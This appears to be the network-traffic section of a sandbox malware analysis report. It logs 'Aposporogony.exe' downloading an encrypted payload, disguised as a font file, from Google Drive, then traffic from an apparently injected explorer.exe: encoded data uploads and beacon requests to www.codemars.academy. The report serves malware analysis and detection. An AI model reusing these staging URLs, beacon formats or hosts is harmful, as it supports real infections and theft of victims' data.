                                                                                                                                                                                    Data Ascii: EkjBRCWmPDxd(3U7EuVTEXvVRl8BBSw7i_UcxnRdTP9OQV1Vzy9R4Jzwv0p7i93ny8dsCPEiZevtbjFDHUE6c0iM0Vcvi_HRG81b(RhWKQ3BsqQGzZyBR1hmrL1rpiYflknc0qfu52o25HHka8r7cHekIvprFlEEIzeulFWX9Mc1SitrEw2e~rav6a1Et9x_Z05HzNHDHFVuuunBCDHa02JVHoZ2gGl-Sqb3yPLjq_JPfLnWVyM
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668415070 CET2187OUTData Raw: 5a 4a 30 62 4d 30 6b 77 69 36 58 50 56 59 42 67 64 73 52 4d 4c 36 77 44 53 46 48 49 32 4f 43 41 37 5f 50 70 65 34 6d 58 41 69 50 58 5a 35 6c 64 46 6f 51 30 69 6d 69 69 6b 76 58 6f 4d 37 76 35 79 56 44 6e 7a 6e 69 5f 76 5a 34 77 64 73 55 6b 31 75
                                                                                                                                                                                    Data Ascii: ZJ0bM0kwi6XPVYBgdsRML6wDSFHI2OCA7_Ppe4mXAiPXZ5ldFoQ0imiikvXoM7v5yVDnzni_vZ4wdsUk1uTM1_Qt4YMTgQuxCuUhXXIr6IXR(P(krtG1nxVc5Blu2TbEZCYAz7TgYknovaRDTG702fklKoNkunl0yEMBkNw6aW2XJ4QvRNqtjjaXn-RR5l4AeNtkfXMas4ZfOUCeeqBbMHSyoINF2SVYWH2mw2Dg9n8d4nSsmwS
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668576956 CET2192OUTData Raw: 6f 36 4b 32 77 2d 41 31 4c 63 6d 4a 44 58 43 45 58 67 76 57 36 50 7a 61 4d 75 51 57 33 56 61 65 32 56 59 70 68 73 41 4b 67 48 67 4a 72 6b 30 4f 4d 73 78 44 67 31 7a 65 6c 30 4a 6a 58 76 32 37 6e 74 69 30 6e 38 63 51 4c 78 4f 55 7e 5f 6d 72 28 71
                                                                                                                                                                                    Data Ascii: o6K2w-A1LcmJDXCEXgvW6PzaMuQW3Vae2VYphsAKgHgJrk0OMsxDg1zel0JjXv27nti0n8cQLxOU~_mr(qLA5vabonB9T2fFU_xxbO5OCfIs1I4_s5bDwbbMN2a86s2GQCWCZz9msYzE2J6jM5Xb5lkADdHF~k575vU_ZBnkJMFgzr9ISITT5szsgHD_5z1FfhHWpGh-V8Rx7sYX(_CBfJurCNUQUtQ8Nom-tG4yT0bO0RwHW-q
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682086945 CET2194OUTData Raw: 64 4c 34 53 63 39 33 64 48 50 4a 75 48 68 63 77 4a 4f 76 34 69 64 66 7a 59 32 49 76 6d 56 59 55 49 6c 72 5a 63 53 53 77 49 4f 39 75 72 73 48 53 31 33 66 67 43 54 30 4f 7e 69 43 58 6c 78 71 69 66 49 6d 6d 6b 70 32 5f 4b 4c 30 61 70 6f 7e 54 44 78
                                                                                                                                                                                    Data Ascii: dL4Sc93dHPJuHhcwJOv4idfzY2IvmVYUIlrZcSSwIO9ursHS13fgCT0O~iCXlxqifImmkp2_KL0apo~TDxThR_0pxxotQcEYJO8rjrklXQDSrplv3eFmia50QKgOnGfseaOBqNU6Ug9utJI8FnHWVanwFO1Ie2MXWjbtL9Mffmd6BXEb0Cdw9n9dGgu1A14Isp5APH7cpQpo1_pp4SaSj3K1tb43W5gbb-ZoXbnnlcCja8Ki0a1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682228088 CET2200OUTData Raw: 4d 51 32 75 63 32 4f 32 6b 38 55 53 74 6d 54 47 74 5a 74 33 64 56 63 6e 6d 77 64 50 47 6e 33 64 56 74 55 55 54 79 34 69 6a 35 32 59 36 30 7a 5f 59 37 71 61 41 70 7e 35 67 30 63 56 68 7a 54 66 75 4c 4f 61 38 50 44 67 35 4e 54 6a 75 74 53 6f 46 64
                                                                                                                                                                                    Data Ascii: MQ2uc2O2k8UStmTGtZt3dVcnmwdPGn3dVtUUTy4ij52Y60z_Y7qaAp~5g0cVhzTfuLOa8PDg5NTjutSoFd84WiDOtoy2Lv~e490cwOfSLH67eDh4GBa6QLZ-df2rC9uSiGP-YoQC2Do9Po29UVg7kOKOqymYLA1BWfMf5O76YUjzYMah2KjMqEzQlj3HO5~5VIZ7NRv_u5uiM6nH(qiBl7Fx7zAus4(gJJolMOHsG5NisvGhuEf
                                                                                                                                                                                    Nov 21, 2022 19:25:45.699820042 CET2207INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:45 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    95192.168.11.2049922217.160.0.180C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:25:47.682972908 CET2208OUTGET /nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9p HTTP/1.1
                                                                                                                                                                                    Host: www.codemars.academy
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:25:47.702331066 CET2209INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 837
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:25:47 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    0192.168.11.2049818142.250.185.78443C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2022-11-21 18:18:35 UTC0OUTGET /uc?export=download&id=1stXX8Uj1RjHVqk-MVjs7YkPXjSyawEff HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2022-11-21 18:18:35 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:18:35 GMT
                                                                                                                                                                                    Location: https://doc-00-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aa7vto4aijg1pkg5c538nvekfh9g64qn/1669054650000/00631903678986001080/*/1stXX8Uj1RjHVqk-MVjs7YkPXjSyawEff?e=download&uuid=f9b422c8-2ce3-49b6-9ddb-2eda7c45f4e1
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-49z0UywRlinJVUjD0YXCzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    1192.168.11.2049819142.250.185.161443C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2022-11-21 18:18:36 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aa7vto4aijg1pkg5c538nvekfh9g64qn/1669054650000/00631903678986001080/*/1stXX8Uj1RjHVqk-MVjs7YkPXjSyawEff?e=download&uuid=f9b422c8-2ce3-49b6-9ddb-2eda7c45f4e1 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: doc-00-7s-docs.googleusercontent.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2022-11-21 18:18:36 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                    X-GUploader-UploadID: ADPycdsn6fEAXRE3DBsC2HBMV_Nwu1Vle6pzj99LULVvgAQ5Mb6dqbtlEFkLloPu-uvGmkEOk367t-pA4o8gqXHlYHREJ4e_yfcC
                                                                                                                                                                                    Content-Type: application/x-font
                                                                                                                                                                                    Content-Disposition: attachment; filename="upYOXaTjMbXPFEcwiJLIRQdG78.pfb"; filename*=UTF-8''upYOXaTjMbXPFEcwiJLIRQdG78.pfb
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context
                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                    Content-Length: 189504
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:18:36 GMT
                                                                                                                                                                                    Expires: Mon, 21 Nov 2022 18:18:36 GMT
                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                    X-Goog-Hash: crc32c=B8gQDA==
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2022-11-21 18:18:36 UTC6INData Raw: f0 cf 05 f0 b1 e2 a5 83 4e 56 2c b0 f8 29 9b f8 5a db df 70 48 86 1b 7b 88 04 10 ce 6e 09 4e 65 13 2e e1 08 38 ca 77 e6 6c 53 89 6f cf bb 8b 4c a8 c6 59 13 2e 4a 18 1b a5 c4 ff 8c b3 5c 34 73 e8 79 b5 45 f7 0c b3 44 dc df 67 40 44 44 c5 0f 88 54 89 22 c4 5f b3 6e af b5 12 be 9a fe b9 41 94 c9 94 60 c7 ca 3e 88 03 69 4c ab 45 8b e5 3e 67 47 09 f9 d5 92 4f c3 3b 20 e9 87 7d 50 fb 1d be e9 d3 4d f0 68 e0 f9 60 38 03 d7 4d 6a cc 5f b6 72 95 46 7c 52 9a 31 4e 5f 93 8e f8 42 97 7a b4 d3 2f 0f 8c e5 1b 92 81 d6 9e 2c 0a ba 10 08 cb c5 b3 a6 39 db 46 b0 c9 16 a4 7b b1 ed 01 27 e8 f6 c5 29 f6 6c d9 e9 5b 76 d8 6d 22 6f 8e 90 72 55 20 2e 61 f7 52 da 76 ff e2 1a fc 00 fe 21 b0 a4 b9 68 5e a3 7d 26 52 33 5a e5 5a 05 04 cc cd f6 e3 d0 ca 1d 7b 0e 90 fe a5 be f6 8c 65
                                                                                                                                                                                    Data Ascii: NV,)ZpH{nNe.8wlSoLY.J\4syEDg@DDT"_nA`>iLE>gGO; }PMh`8Mj_rF|R1N_Bz/,9F{')l[vm"orU .aRv!h^}&R3ZZ{e
                                                                                                                                                                                    2022-11-21 18:18:36 UTC10INData Raw: e1 6f 07 68 07 c1 21 aa a1 95 b5 1d c5 23 10 6d 5e 81 8a 1c 21 28 97 57 dc 2a c3 5a de 62 5e 91 ae c0 45 03 02 00 7f 20 fc 98 2a 43 b2 38 58 45 ac ce fa 69 c4 82 f9 19 e2 93 ab ca 84 fb bf 52 b4 b1 ed f1 a9 a7 92 f9 ed 65 12 b5 da aa 74 43 be 23 86 eb 2e 75 fb 80 b8 9e d3 f9 46 56 8b ea 4d 57 53 53 90 17 c3 5f 38 3f f1 9e 2a 75 0a 70 11 89 ee 78 28 e1 03 24 59 9f e3 eb 1b a7 87 4b 5c 06 74 2f 66 7e 78 78 70 87 d7 dd 57 aa e6 80 a2 eb 73 cc db 56 71 bf 8f bf 55 ff 0c 63 c9 13 35 de 91 c5 f2 93 37 9d 9a 7d 81 46 a8 ca 51 69 ed 1c 78 44 07 79 50 18 e6 41 49 39 38 9f dd df 52 d1 10 f4 01 70 8e d0 ca 26 09 6a 64 79 0a ea d1 50 81 ed e8 09 e8 df d9 05 1d 42 83 26 61 10 1e 56 b8 55 d3 93 6e 45 d2 8b e6 aa e2 3f 14 9d 08 2e c0 9d 6d 7f e6 68 73 3a 36 c0 2d 3f 88
                                                                                                                                                                                    Data Ascii: oh!#m^!(W*Zb^E *C8XEiRetC#.uFVMWSS_8?*upx($YK\t/f~xxpWsVqUc57}FQixDyPAI98Rp&jdyPB&aVUnE?.mhs:6-?
                                                                                                                                                                                    2022-11-21 18:18:36 UTC13INData Raw: 6d 3f e2 8c f4 b0 aa 6c 56 03 46 eb ed 44 67 ed 6e 4b da 19 81 07 fe 77 bd 64 c4 bb 7d 14 9a 8e 50 d2 4d da f3 84 d8 f8 e8 9a 65 73 32 88 ca 6f 8e f4 9b 32 07 e7 a0 71 7f 9b 4f f1 f9 24 d8 cd e2 aa c5 04 16 92 4e 50 7b 3f 9b 30 58 25 22 a3 c6 d1 0c af b0 29 53 b2 54 52 36 16 24 2b 87 ff 29 ec c8 1b ab 36 5a 90 49 58 af 4d 8f 2d 81 e7 c5 50 a0 52 dc f8 33 6e b9 d5 32 41 6d 12 a8 29 b4 d0 5d e3 f2 4a af e5 69 c7 a7 20 1c 46 73 cb 07 65 5f ea 10 b3 66 5f b6 12 91 aa f7 2b 3f 68 2f 0b 71 90 9a 5e 52 6e 08 67 c9 29 2e de 3b 20 10 0c f9 65 6e bc 28 21 03 d9 08 76 4a 7a e3 e0 f5 2a 4b 22 a3 b1 94 88 57 84 ac 3d 4a 91 43 59 cf 0f 9f 75 3a 40 a7 a9 c6 6c 29 66 c2 09 47 53 b7 33 73 c2 41 22 77 8e 0a 42 40 15 5f fc ef 2d e9 0b e3 2b 32 ba dc 5e c1 e6 27 c8 d0 9d ff
                                                                                                                                                                                    Data Ascii: m?lVFDgnKwd}PMes2o2qO$NP{?0X%")STR6$+)6ZIXM-PR3n2Am)]Ji Fse_f_+?h/q^Rng).; en(!vJz*K"W=JCYu:@l)fGS3sA"wB@_-+2^'
                                                                                                                                                                                    2022-11-21 18:18:36 UTC17INData Raw: d9 ec 39 58 e8 8e cc e8 44 a6 a7 a2 f5 76 77 83 51 17 96 57 42 49 05 ca 99 03 96 9c 60 2e c4 c8 bd 81 9c bd 10 12 47 bf 9b 8b a4 68 04 60 e6 32 cb 58 10 e7 e0 69 4a 7a 0d c8 d5 aa
                                                                                                                                                                                    Data Ascii: 9XDvwQWBI`.Gh`2XiJz
                                                                                                                                                                                    2022-11-21 18:18:36 UTC18INData Raw: ac 64 a4 1f 16 be f4 75 e5 7c 16 d3 88 36 04 26 94 68 bc 95 4b 23 19 0f 1c d7 e2 29 bd 16 4d 63 63 22 e3 87 40 95 d5 d3 d7 d2 fe 75 d0 77 ba 97 6d 8e 99 2e 23 e5 77 a1 c0 23 5a 84 73 a4 7c 60 b3 df 12 ce d9 17 5b c7 33 c7 4f 97 5d 38 4b e5 63 0b 13 5f d6 5c e4 d4 b1 f6 f1 12 73 62 72 70 04 35 53 f3 74 af 64 ea 8d b9 4e b1 4e 22 be bd 80 48 16 31 f1 c2 e4 54 f9 38 55 24 45 2e a4 11 a4 c1 9b 75 43 7f 0f ab 31 75 99 0e a2 27 f2 53 13 ce dc 17 60 ee bc e4 37 9d 18 1b 5a cc 7b 6f 39 ce 10 b1 15 68 04 7f 6f 20 57 c0 a1 90 4a 46 4e 54 32 b2 4d d3 8e ad 85 d3 62 ab 52 8b 03 86 c4 ac 4d ee 02 b1 57 9d 67 86 53 37 3a 16 72 aa d7 08 5a 08 01 6e 20 3b 99 05 bb ca 0c b1 d7 ac 48 35 33 93 95 28 ba 12 04 f1 b0 91 69 97 fd 4b 64 6f 8b 0b c4 68 5f d4 04 cd d8 2d a4 ee 27
                                                                                                                                                                                    Data Ascii: du|6&hK#)Mcc"@uwm.#w#Zs|`[3O]8Kc_\sbrp5StdNN"H1T8U$E.uC1u'S`7Z{o9ho WJFNT2MbRMWgS7:rZn ;H53(iKdoh_-'
